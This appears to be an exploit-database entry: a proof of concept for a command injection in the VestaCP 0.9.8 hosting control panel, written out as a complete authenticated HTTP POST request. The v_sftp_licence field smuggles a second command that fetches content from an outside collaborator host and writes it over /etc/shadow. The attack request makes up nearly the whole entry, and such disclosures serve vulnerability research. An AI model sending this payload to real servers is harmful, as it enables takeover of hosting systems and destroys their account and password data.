Share
## https://sploitus.com/exploit?id=PACKETSTORM:161873
# Title: VestaCP 0.9.8 - 'v_sftp_licence' Command Injection  
# Date: 17.03.2021  
# Author: Numan Türle  
# Vendor Homepage: https://vestacp.com  
# Software Link: https://myvestacp.com < 0.9.8-26-43  
# Software Link: https://vestacp.com < 0.9.8-26  
  
  
POST /edit/server/ HTTP/1.1  
Host: TARGET:8083  
Connection: close  
Content-Length: 6633  
Cache-Control: max-age=0  
Content-Type: application/x-www-form-urlencoded  
User-Agent: USER_AGENT  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Encoding: gzip, deflate  
Accept-Language: en,tr-TR;q=0.9,tr;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4  
Cookie: PHPSESSID=HERE_COOKIE  
sec-gpc: 1  
  
token=149e2b8c201fd88654df6fd694158577&save=save&v_hostname=1338.example.com&v_timezone=Europe%2FIstanbul&v_language=en&v_mail_url=&v_mail_ssl_domain=&v_mysql_url=&v_mysql_password=&v_backup=yes&v_backup_gzip=5&v_backup_dir=%2Fbackup&v_backup_type=ftp&v_backup_host=&v_backup_username=&v_backup_password=&v_backup_bpath=&v_web_ssl_domain=&v_sys_ssl_crt=privatekeyblablabla&v_quota=no&v_firewall=no&v_sftp=yes&v_sftp_licence=1 1337.burpcollaborator.net -o /etc/shadow&v_filemanager=no&v_filemanager_licence=&v_softaculous=yes&save=Save  
  
  
  
Parameter : v_sftp_licence=1 1337.burpcollaborator.net -o /etc/shadow